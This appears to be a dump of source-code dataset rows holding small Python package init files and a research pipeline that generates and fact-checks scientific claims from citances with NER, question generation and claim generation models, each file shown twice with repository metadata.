HandlerType.GUILD_EVENT_HANDLER.value: guild_event_handler,
HandlerType.GUILD_MEMBER_EVENT_HANDLER.value: guild_member_event_handler,
HandlerType.CHANNEL_EVENT_HANDLER.value: channel_event_handler,
HandlerType.MESSAGE_EVENT_HANDLER.value: message_event_handler,
HandlerType.MESSAGE_DELETE_EVENT_HANDLER.value: delete_message_event_handler,
HandlerType.AT_MESSAGE_EVENT_HANDLER.value: at_message_event_handler,
HandlerType.PUBLIC_MESSAGE_DELETE_EVENT_HANDLER.value: public_message_delete_event_handler,
HandlerType.DIRECT_MESSAGE_EVENT_HANDLER.value: direct_message_event_handler,
HandlerType.DIRECT_MESSAGE_DELETE_EVENT_HANDLER.value: delete_direct_message_event_handler,
HandlerType.AUDIO_EVENT_HANDLER.value: audio_event_handler,
HandlerType.MESSAGE_REACTIONS_EVENT_HANDLER.value: message_reactions_event_handler,
HandlerType.INTERACTION_CREATE_HANDLER.value: interaction_create_event_handler,
}
| 2,608 | 448 | 371 |
6a5b7b85e25ad6e52a7e2f33c9b07580428c05e1 | 210 | py | Python | dmk/b_cryptoblobs/__init__.py | rtmigo/ksf_py | 63be2af622181e8c2bbe4b318f4b780a38ee6606 | [
"MIT"
] | 2 | 2021-06-22T18:24:42.000Z | 2021-10-04T12:03:04.000Z | dmk/b_cryptoblobs/__init__.py | rtmigo/ksf_py | 63be2af622181e8c2bbe4b318f4b780a38ee6606 | [
"MIT"
] | null | null | null | dmk/b_cryptoblobs/__init__.py | rtmigo/ksf_py | 63be2af622181e8c2bbe4b318f4b780a38ee6606 | [
"MIT"
] | 1 | 2021-06-20T04:04:51.000Z | 2021-06-20T04:04:51.000Z | # SPDX-FileCopyrightText: (c) 2021 Artёm IG <github.com/rtmigo>
# SPDX-License-Identifier: MIT
from ._20_encdec_part import DecryptedIO
from ._30_encdec_multipart import MultipartEncryptor, decrypt_from_dios
| 30 | 71 | 0.82381 | # SPDX-FileCopyrightText: (c) 2021 Artёm IG <github.com/rtmigo>
# SPDX-License-Identifier: MIT
from ._20_encdec_part import DecryptedIO
from ._30_encdec_multipart import MultipartEncryptor, decrypt_from_dios
| 0 | 0 | 0 |
f29f5bf6f7181d82bf8e1b8f19f689662b5e9ef0 | 97 | py | Python | mort/__init__.py | brycepg/mort | 9d79144ff2fcd68af96b8140ab6d42a6a0e83abc | [
"MIT"
] | 2 | 2019-08-01T15:04:49.000Z | 2021-04-18T01:11:09.000Z | mort/__init__.py | brycepg/mort | 9d79144ff2fcd68af96b8140ab6d42a6a0e83abc | [
"MIT"
] | null | null | null | mort/__init__.py | brycepg/mort | 9d79144ff2fcd68af96b8140ab6d42a6a0e83abc | [
"MIT"
] | null | null | null | """Automatically run post mortem debugging"""
from .mort import main, run
__version__ = "0.9.1"
| 19.4 | 45 | 0.721649 | """Automatically run post mortem debugging"""
from .mort import main, run
__version__ = "0.9.1"
| 0 | 0 | 0 |
fd2dc8edc7e3699bebcc9491b9169fabae740d5a | 22,860 | py | Python | claimgen_entity.py | allenai/scientific-claim-generation | 4b8890e2fbeab443cde43f8f49ba989f8e183a61 | [
"Apache-2.0"
] | 6 | 2022-03-24T04:17:30.000Z | 2022-03-30T17:34:24.000Z | claimgen_entity.py | allenai/scientific-claim-generation | 4b8890e2fbeab443cde43f8f49ba989f8e183a61 | [
"Apache-2.0"
] | null | null | null | claimgen_entity.py | allenai/scientific-claim-generation | 4b8890e2fbeab443cde43f8f49ba989f8e183a61 | [
"Apache-2.0"
] | null | null | null | import argparse
import random
import numpy as np
import torch
import spacy
import scispacy
import json
import os
import pandas as pd
from spacy.training import Example
from tqdm import tqdm
from datasets import Dataset
from functools import partial
from custom_trainer import CustomTrainer
import ipdb
from collections import defaultdict
from scipy.special import softmax
from spacy.util import minibatch, compounding
from generate_claim_variants import kbin
from transformers import pipeline
import transformers
from transformers import (
AutoModelForSeq2SeqLM,
AutoTokenizer,
Seq2SeqTrainingArguments,
HfArgumentParser,
set_seed,
PreTrainedTokenizerBase,
PreTrainedModel,
DataCollatorForSeq2Seq,
AutoModelForCausalLM
)
from ParagraphJointModel.paragraph_model_dynamic import JointParagraphClassifier
from ParagraphJointModel.dataset import SciFactParagraphBatchDataset
from ParagraphJointModel.scifact_joint_paragraph_dynamic_prediction import predict, post_process_stance
from ParagraphJointModel.util import stance2json, rationale2json, merge_json
def qg_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for QG model input
:param tokenizer: QG model tokenizer
:param dset: Dataset name, either 'local' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to QG model
"""
if dset == 'local':
inputs = [ctx + ' ' + ans[0]['text'] for ctx, ans in zip(examples['context'], examples['answers'])]
else:
inputs = [ctx + ' ' + ans['text'][0] for ctx, ans in zip(examples['context'], examples['answers'])]
targets = [q for i,q in enumerate(examples['question'])]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
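# Illustrative 'local' input (made-up values): a row with
#   context = "Aspirin reduces fever in adults."
#   answers = [{'text': 'Aspirin', ...}]
# is encoded from the string "Aspirin reduces fever in adults. Aspirin",
# and the gold question string is tokenized as the decoder labels.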
def q2c_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for claim generation model input
:param tokenizer: claim generation model tokenizer
:param dset: Dataset name, either 'citeworth' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to claim generation model
"""
if dset == 'citeworth':
inputs = [ctx + ' ' + ans['text'] for ctx, ans in zip(examples['generated_question'], examples['answer'])]
targets = [''] * len(inputs)
else:
inputs = [q + ' ' + a for q,a in zip(examples['question'], examples['answer'])]
targets = [a for a in examples['turker_answer']]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def sort_fc_claims(preds, original_claims):
"""
Scores each claim using the formula:
$$ s = p[support] - p[contradict] $$
Returns the claims sorted by this score in descending order
:param preds: The raw logits from ParagraphJointModel for each evidence sample for each claim
:param original_claims: The original generated claims
:return: Sorted claims with their fact checking score
"""
orig_claim_map = {c['id']: c for c in original_claims}
for p in preds:
all_probs = [softmax(p['evidence'][e]['score']) for e in p['evidence']]
score = max(p[1] - p[2] for p in all_probs)
orig_claim_map[p['id']]['score'] = score
return list(sorted([v for v in orig_claim_map.values()], key=lambda x: x['score'], reverse=True))
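# Small illustration of the ranking score (defined for clarity only, never
# called by the pipeline): with the label order used above (index 1 = SUPPORT,
# index 2 = CONTRADICT), one evidence paragraph's raw logits are softmax-normalized
# and scored as the probability difference, which lies in [-1, 1].
def _example_fc_score(logits=(0.1, 2.0, -1.0)):
    """Illustrative only: score a single evidence paragraph's raw logits."""
    probs = softmax(list(logits))
    return probs[1] - probs[2]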
def save_ner_model(output_dir, nlp, new_model_name):
"""
Save a spacy model
:param output_dir: Where to save the model
:param nlp: The scispacy model to save
:param new_model_name: New name for the spacy model
:return:
"""
output_dir = f'ner_models/{output_dir}'
if output_dir is not None:
if not os.path.exists(output_dir):
os.makedirs(output_dir)
nlp.meta["name"] = new_model_name
nlp.to_disk(output_dir)
print("Saved model to", output_dir)
def get_named_entities(citances, nlp):
"""
Extract named entities from a set of citances
:param citances:
:param nlp:
:return: List of dicts containing input to question generation model
"""
question_gen_input = defaultdict(list)
for citance_dict in tqdm(citances):
citance = citance_dict['text'] if 'text' in citance_dict else citance_dict['claims']
entities = []
entity_text = []
doc = nlp(citance)
entities.extend(list(doc.ents))
entity_text.extend([e.text for e in doc.ents])
for ent in entities:
answers = [{'text': ent.text, 'type': ent.label_, 'start': ent.start_char, 'pos': [t.pos_ for t in ent]}]
if 'doc_id' in citance_dict:
sample = {'id': citance_dict['doc_id'], 'paper_id': citance_dict['paper_id'],
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': citance_dict['evidence']}
else:
sample = {'id': '', 'paper_id': '',
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': ''}
for k in sample:
question_gen_input[k].append(sample[k])
return question_gen_input
def run_question_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of questions from a source text and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate questions from
:param model: Question generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing input to the claim generation model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
claim_gen_input = defaultdict(list)
for id, con, ans, q, citance, paper_id, evidence in zip(dset['id'], dset['context'], dset['answers'],
all_samples, dset['citance'], dset['paper_id'],
dset['evidence']):
gen_question = tokenizer.decode(q, skip_special_tokens=True, clean_up_tokenization_spaces=False)
sample = {'id': id, 'paper_id': paper_id, 'context': con, 'answer': ans[0], 'generated_question': gen_question,
'citance': citance, 'evidence': evidence}
for k in sample:
claim_gen_input[k].append(sample[k])
return claim_gen_input
def run_claim_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of claims from a question and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate claims from
:param model: Claim generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing the generated claims and a list of dicts containing the input to external fact
checking model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
generated_claims = []
fc_claim_inputs = []
count = defaultdict(int)
for id, con, ans, q, claim, citance, paper_id, evidence in zip(dset['id'], dset['context'],
dset['answer'], dset['generated_question'],
all_samples, dset['citance'],
dset['paper_id'], dset['evidence']):
gen_claim = tokenizer.decode(claim, skip_special_tokens=True, clean_up_tokenization_spaces=False)
n = count[id]
generated_claims.append(
{'id': f"{id}_{n}", 'paper_id': paper_id, 'context': con, 'citance': citance, 'answer': ans,
'generated_question': q,
'generated_claim': gen_claim, 'evidence': evidence})
fc_claim_inputs.append({'id': f"{id}_{n}", 'claim': gen_claim, 'evidence': {}, 'cited_doc_ids': evidence,
'retrieved_doc_ids': evidence})
count[id] += 1
return generated_claims, fc_claim_inputs
def retrain_ner_model(ner_data, nlp):
"""
Run NER training starting from a given spacy model
:param ner_data: NER training data
:param nlp: Spacy model to start from
:return: Trained spacy model
"""
print(len(ner_data))
random.shuffle(ner_data)
N = int(0.8*len(ner_data))
#Use 20% for validation
ner_training_data = ner_data[:N]
ner_validation_data = ner_data[N:]
pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"]
unaffected_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]
best_f = 0.0
patience = 10
pcounter = 0
with nlp.disable_pipes(*unaffected_pipes):
# Training for 100 iterations w/ early stopping
for iteration in range(100):
            # shuffling examples before every iteration
random.shuffle(ner_training_data)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(ner_training_data, size=compounding(4.0, 32.0, 1.001))
for batch in batches:
#texts, annotations = zip(*batch)
nlp.update(
batch, # batch of annotations
drop=0.1, # dropout - make it harder to memorise data
losses=losses,
)
#print("Losses", losses)
# Get validation scores
f1 = nlp.evaluate(ner_validation_data)['ents_f']
print(f"Eval f1: {f1}")
if f1 > best_f:
best_f = f1
save_ner_model("curriculum_learning", nlp, "cl-model")
pcounter = 0
else:
pcounter += 1
if pcounter == patience:
break
return spacy.load("ner_models/curriculum_learning")
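# Note on the expected input (sketch): each element of ner_data should be a
# spacy.training.Example pairing a Doc with its gold entity spans, e.g.
#   doc = nlp.make_doc("EGFR mutations drive resistance")
#   ner_data.append(Example.from_dict(doc, {"entities": [(0, 4, "ENTITY")]}))
# The offsets are illustrative; the 'ENTITY' label matches the one attached to
# citance answers in the main block below.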
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--train_citances", help="Location of the citance data", required=True, type=str)
parser.add_argument("--val_citances", help="Location of the validation citance data", required=True, type=str)
parser.add_argument("--test_citances", help="Location of the test citance data", required=True, type=str)
parser.add_argument("--qg_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--q2c_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--fc_model_name", help="Name of the fact checking model", required=True,
default='roberta-large')
parser.add_argument("--fc_model_checkpoint", help="Name of the fact checking model", required=False,
default=None)
parser.add_argument("--external_corpus_file", help="Evidence corpus file", required=True,
type=str)
parser.add_argument("--internal_corpus_file", help="Other paragraphs from citance documents", required=True,
type=str)
parser.add_argument("--seed", help="Random seed", type=int, default=1000)
parser.add_argument("--num_beams", help="Number of beams for beam search", type=int, default=1)
parser.add_argument("--output_dir", help="Directory to output files", required=True, type=str)
args = parser.parse_args()
enforce_reproducibility(args.seed)
# See if CUDA available
device = torch.device("cpu")
if torch.cuda.is_available():
print("Training on GPU")
device = torch.device("cuda:0")
# Setup
nlp = spacy.load('en_core_sci_md')
# QG model setup
qg_model = args.qg_model_name
qg_tokenizer = AutoTokenizer.from_pretrained(qg_model)
qg_model = AutoModelForSeq2SeqLM.from_pretrained(qg_model)
# Q2C model setup
q2c_model = args.q2c_model_name
q2c_tokenizer = AutoTokenizer.from_pretrained(q2c_model)
q2c_model = AutoModelForSeq2SeqLM.from_pretrained(q2c_model)
# FC model setup
fc_tokenizer = AutoTokenizer.from_pretrained(args.fc_model_name)
fc_model = JointParagraphClassifier(args.fc_model_name, 1024,
0.0)
state_dict = torch.load(args.fc_model_checkpoint)
# strict = false because of bert.embeddings.position_ids mismatch
fc_model.load_state_dict(state_dict, strict=False)
# Language model for negative claim generation
lm = AutoModelForCausalLM.from_pretrained('gpt2')
lm_tk = AutoTokenizer.from_pretrained('gpt2')
########### Run NER on input
with open(args.train_citances) as f:
citances = [json.loads(l) for l in f]
with open(args.val_citances) as f:
val_citances = [json.loads(l) for l in f]
with open(args.test_citances) as f:
test_citances = [json.loads(l) for l in f]
ner_data = []
output_claims = []
if not os.path.exists(f"{args.output_dir}"):
os.makedirs(f"{args.output_dir}")
save_dir = f"{args.output_dir}"
question_gen_input = get_named_entities(citances, nlp)
val_question_gen_input = get_named_entities(val_citances, nlp)
test_question_gen_input = get_named_entities(test_citances, nlp)
############ Generate questions from NER
qg_model.to(device)
preprocessor = partial(qg_data_preprocess, qg_tokenizer, 'local')
gen_dset_base = Dataset.from_dict(question_gen_input)
val_gen_dset_base = Dataset.from_dict(val_question_gen_input)
test_gen_dset_base = Dataset.from_dict(test_question_gen_input)
# Filter missing NER
#gen_dset_base = gen_dset_base.filter(lambda example: len(example['answers']) > 0)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
qg_tokenizer,
model=qg_model,
label_pad_token_id=-100,
padding='longest'
)
qg_trainer = CustomTrainer(
model=qg_model,
tokenizer=qg_tokenizer,
data_collator=data_collator
)
claim_gen_input = run_question_generation(qg_trainer, gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
val_claim_gen_input = run_question_generation(qg_trainer, val_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
test_claim_gen_input = run_question_generation(qg_trainer, test_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
qg_model.to('cpu')
############ Generate claims from questions
q2c_model.to(device)
preprocessor = partial(q2c_data_preprocess, q2c_tokenizer, 'citeworth')
gen_dset_base = Dataset.from_dict(claim_gen_input)
val_gen_dset_base = Dataset.from_dict(val_claim_gen_input)
test_gen_dset_base = Dataset.from_dict(test_claim_gen_input)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
q2c_tokenizer,
model=q2c_model,
label_pad_token_id=-100,
padding='longest'
)
q2c_trainer = CustomTrainer(
model=q2c_model,
tokenizer=q2c_tokenizer,
data_collator=data_collator
)
generated_claims, fc_claim_inputs = run_claim_generation(q2c_trainer, gen_dset, q2c_model, q2c_tokenizer, device, args.num_beams)
val_generated_claims, _ = run_claim_generation(q2c_trainer, val_gen_dset, q2c_model, q2c_tokenizer,
device, args.num_beams)
test_generated_claims, _ = run_claim_generation(q2c_trainer, test_gen_dset, q2c_model, q2c_tokenizer, device,
args.num_beams)
with open(f"{save_dir}/output_test_claims.jsonl", 'wt') as f:
for c in test_generated_claims:
f.write(json.dumps(c) + '\n')
with open(f"{save_dir}/output_scifact_dev_claims.jsonl", 'wt') as f:
for c in val_generated_claims:
f.write(json.dumps(c) + '\n')
q2c_model.to('cpu')
# Run FC model
fc_model.to(device)
#TODO get the data into the right format
fc_dev_set = SciFactParagraphBatchDataset(args.external_corpus_file, fc_claim_inputs,
sep_token=fc_tokenizer.sep_token, k=0, train=False)
rationale_predictions, stance_preds, stance_scores = predict(fc_model, fc_dev_set, 16, args.fc_model_name, fc_tokenizer, device)
rationale_json = rationale2json(fc_dev_set.samples, rationale_predictions)
stance_json = stance2json(fc_dev_set.samples, stance_preds, stance_scores)
stance_json = post_process_stance(rationale_json, stance_json)
merged_json = merge_json(rationale_json, stance_json)
fc_model.to('cpu')
# Rank predictions
sorted_fc_claims = sort_fc_claims(merged_json, generated_claims)
# Get new entities
citance_entity_map = defaultdict(lambda: {'text': '', 'entities': []})
original_claims = [c for c in sorted_fc_claims if c['score'] > 0.5]
for c in original_claims:
citance_entity_map[c['id']]['text'] = c['citance']
citance_entity_map[c['id']]['entities'].append(
(c['answer']['start'], c['answer']['start'] + len(c['answer']['text']), 'ENTITY'))
output_claims.extend(original_claims)
citances = [c for c in citances if c['doc_id'] not in citance_entity_map]
output_claims.extend([c for c in sorted_fc_claims if c['score'] <= 0.5])
with open(f"{save_dir}/added_claims.jsonl", 'wt') as f:
for c in output_claims:
f.write(json.dumps(c) + '\n')
csv_out = []
for c in output_claims:
csv_out.append([c['context'], c['citance'], c['generated_claim'], c['score']])
csv_pd = pd.DataFrame(csv_out, columns=['Context', 'Original Sentence', 'Claim', 'Score'])
csv_pd.to_csv(f"{save_dir}/ranked_claims.csv", index=None)
# Generate training data for fact checking
nli = pipeline('sentiment-analysis', model='roberta-large-mnli', return_all_scores=True, device=0)
# Generate data for scifact training/evaluation
for claim_set in tqdm(test_generated_claims):
neg_claims = kbin([claim_set['generated_claim']], nli, lm, lm_tk, device, 3)
claim_set['neg_claim'] = neg_claims[0][2] if neg_claims[0] is not None else None
# Get corpus so we can pick negative samples for NEI
paper_id_to_paragraph = defaultdict(list)
with open(args.internal_corpus_file) as f:
for l in f:
data = json.loads(l)
paper_id = data['doc_id'].split('_')[0]
paper_id_to_paragraph[paper_id].append(data)
# Pick 1/3 to be supports, 1/3 to be contradicts, and 1/3 to be NEI
inc = incgen()
base_claims_and_evidence = []
for claim_set in test_generated_claims:
# Remove ID suffix to get original paper ID
original_doc_id = claim_set['id']
original_doc_id = original_doc_id[:original_doc_id.rfind('_')]
pos_claim = claim_set['generated_claim']
neg_claim = claim_set['neg_claim']
type = random.randint(0, 2)
if type == 0 or neg_claim == None:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'SUPPORT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 1:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'CONTRADICT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 2:
nei_type = random.randint(0, 1)
if nei_type == 0:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
else:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
with open(f"{save_dir}/scifact_claims.jsonl", 'wt') as f:
for c in base_claims_and_evidence:
f.write(json.dumps(c) + '\n')
| 42.022059 | 133 | 0.646588 | import argparse
import random
import numpy as np
import torch
import spacy
import scispacy
import json
import os
import pandas as pd
from spacy.training import Example
from tqdm import tqdm
from datasets import Dataset
from functools import partial
from custom_trainer import CustomTrainer
import ipdb
from collections import defaultdict
from scipy.special import softmax
from spacy.util import minibatch, compounding
from generate_claim_variants import kbin
from transformers import pipeline
import transformers
from transformers import (
AutoModelForSeq2SeqLM,
AutoTokenizer,
Seq2SeqTrainingArguments,
HfArgumentParser,
set_seed,
PreTrainedTokenizerBase,
PreTrainedModel,
DataCollatorForSeq2Seq,
AutoModelForCausalLM
)
from ParagraphJointModel.paragraph_model_dynamic import JointParagraphClassifier
from ParagraphJointModel.dataset import SciFactParagraphBatchDataset
from ParagraphJointModel.scifact_joint_paragraph_dynamic_prediction import predict, post_process_stance
from ParagraphJointModel.util import stance2json, rationale2json, merge_json
def enforce_reproducibility(seed=1000):
# Sets seed manually for both CPU and CUDA
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# For atomic operations there is currently
# no simple way to enforce determinism, as
# the order of parallel operations is not known.
# CUDNN
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# System based
random.seed(seed)
np.random.seed(seed)
set_seed(seed)
def qg_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for QG model input
:param tokenizer: QG model tokenizer
:param dset: Dataset name, either 'local' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to QG model
"""
if dset == 'local':
inputs = [ctx + ' ' + ans[0]['text'] for ctx, ans in zip(examples['context'], examples['answers'])]
else:
inputs = [ctx + ' ' + ans['text'][0] for ctx, ans in zip(examples['context'], examples['answers'])]
targets = [q for i,q in enumerate(examples['question'])]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def q2c_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for claim generation model input
:param tokenizer: claim generation model tokenizer
:param dset: Dataset name, either 'citeworth' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to claim generation model
"""
if dset == 'citeworth':
inputs = [ctx + ' ' + ans['text'] for ctx, ans in zip(examples['generated_question'], examples['answer'])]
targets = [''] * len(inputs)
else:
inputs = [q + ' ' + a for q,a in zip(examples['question'], examples['answer'])]
targets = [a for a in examples['turker_answer']]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def sort_fc_claims(preds, original_claims):
"""
Scores each claim using the formula:
$$ s = p[support] - p[contradict] $$
Returns the claims sorted by this score in descending order
:param preds: The raw logits from ParagraphJointModel for each evidence sample for each claim
:param original_claims: The original generated claims
:return: Sorted claims with their fact checking score
"""
orig_claim_map = {c['id']: c for c in original_claims}
for p in preds:
all_probs = [softmax(p['evidence'][e]['score']) for e in p['evidence']]
score = max(p[1] - p[2] for p in all_probs)
orig_claim_map[p['id']]['score'] = score
return list(sorted([v for v in orig_claim_map.values()], key=lambda x: x['score'], reverse=True))
def save_ner_model(output_dir, nlp, new_model_name):
"""
Save a spacy model
:param output_dir: Where to save the model
:param nlp: The scispacy model to save
:param new_model_name: New name for the spacy model
:return:
"""
output_dir = f'ner_models/{output_dir}'
if output_dir is not None:
if not os.path.exists(output_dir):
os.makedirs(output_dir)
nlp.meta["name"] = new_model_name
nlp.to_disk(output_dir)
print("Saved model to", output_dir)
def get_named_entities(citances, nlp):
"""
Extract named entities from a set of citances
:param citances:
:param nlp:
:return: List of dicts containing input to question generation model
"""
question_gen_input = defaultdict(list)
for citance_dict in tqdm(citances):
citance = citance_dict['text'] if 'text' in citance_dict else citance_dict['claims']
entities = []
entity_text = []
doc = nlp(citance)
entities.extend(list(doc.ents))
entity_text.extend([e.text for e in doc.ents])
for ent in entities:
answers = [{'text': ent.text, 'type': ent.label_, 'start': ent.start_char, 'pos': [t.pos_ for t in ent]}]
if 'doc_id' in citance_dict:
sample = {'id': citance_dict['doc_id'], 'paper_id': citance_dict['paper_id'],
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': citance_dict['evidence']}
else:
sample = {'id': '', 'paper_id': '',
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': ''}
for k in sample:
question_gen_input[k].append(sample[k])
return question_gen_input
def run_question_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of questions from a source text and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate questions from
:param model: Question generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing input to the claim generation model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
claim_gen_input = defaultdict(list)
for id, con, ans, q, citance, paper_id, evidence in zip(dset['id'], dset['context'], dset['answers'],
all_samples, dset['citance'], dset['paper_id'],
dset['evidence']):
gen_question = tokenizer.decode(q, skip_special_tokens=True, clean_up_tokenization_spaces=False)
sample = {'id': id, 'paper_id': paper_id, 'context': con, 'answer': ans[0], 'generated_question': gen_question,
'citance': citance, 'evidence': evidence}
for k in sample:
claim_gen_input[k].append(sample[k])
return claim_gen_input
def run_claim_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of claims from a question and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate claims from
:param model: Claim generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing the generated claims and a list of dicts containing the input to external fact
checking model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
generated_claims = []
fc_claim_inputs = []
count = defaultdict(int)
for id, con, ans, q, claim, citance, paper_id, evidence in zip(dset['id'], dset['context'],
dset['answer'], dset['generated_question'],
all_samples, dset['citance'],
dset['paper_id'], dset['evidence']):
gen_claim = tokenizer.decode(claim, skip_special_tokens=True, clean_up_tokenization_spaces=False)
n = count[id]
generated_claims.append(
{'id': f"{id}_{n}", 'paper_id': paper_id, 'context': con, 'citance': citance, 'answer': ans,
'generated_question': q,
'generated_claim': gen_claim, 'evidence': evidence})
fc_claim_inputs.append({'id': f"{id}_{n}", 'claim': gen_claim, 'evidence': {}, 'cited_doc_ids': evidence,
'retrieved_doc_ids': evidence})
count[id] += 1
return generated_claims, fc_claim_inputs
def retrain_ner_model(ner_data, nlp):
"""
Run NER training starting from a given spacy model
:param ner_data: NER training data
:param nlp: Spacy model to start from
:return: Trained spacy model
"""
print(len(ner_data))
random.shuffle(ner_data)
N = int(0.8*len(ner_data))
#Use 20% for validation
ner_training_data = ner_data[:N]
ner_validation_data = ner_data[N:]
pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"]
unaffected_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]
best_f = 0.0
patience = 10
pcounter = 0
with nlp.disable_pipes(*unaffected_pipes):
# Training for 100 iterations w/ early stopping
for iteration in range(100):
# shuffle the examples before every iteration
random.shuffle(ner_training_data)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(ner_training_data, size=compounding(4.0, 32.0, 1.001))
for batch in batches:
#texts, annotations = zip(*batch)
nlp.update(
batch, # batch of training examples
drop=0.1, # dropout - make it harder to memorise data
losses=losses,
)
#print("Losses", losses)
# Get validation scores
f1 = nlp.evaluate(ner_validation_data)['ents_f']
print(f"Eval f1: {f1}")
if f1 > best_f:
best_f = f1
save_ner_model("curriculum_learning", nlp, "cl-model")
pcounter = 0
else:
pcounter += 1
if pcounter == patience:
break
return spacy.load("ner_models/curriculum_learning")
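# End-to-end pipeline driven by the __main__ block below:
# 1) extract named entities from citances, 2) generate questions from (context, entity) pairs,
# 3) turn (question, answer) pairs into claims, 4) score the claims with the fact-checking model,
# 5) rank and export them, 6) build SciFact-style training data with generated negative claims.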
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--train_citances", help="Location of the citance data", required=True, type=str)
parser.add_argument("--val_citances", help="Location of the validation citance data", required=True, type=str)
parser.add_argument("--test_citances", help="Location of the test citance data", required=True, type=str)
parser.add_argument("--qg_model_name", help="Name of the model to use for question generation", required=True, type=str)
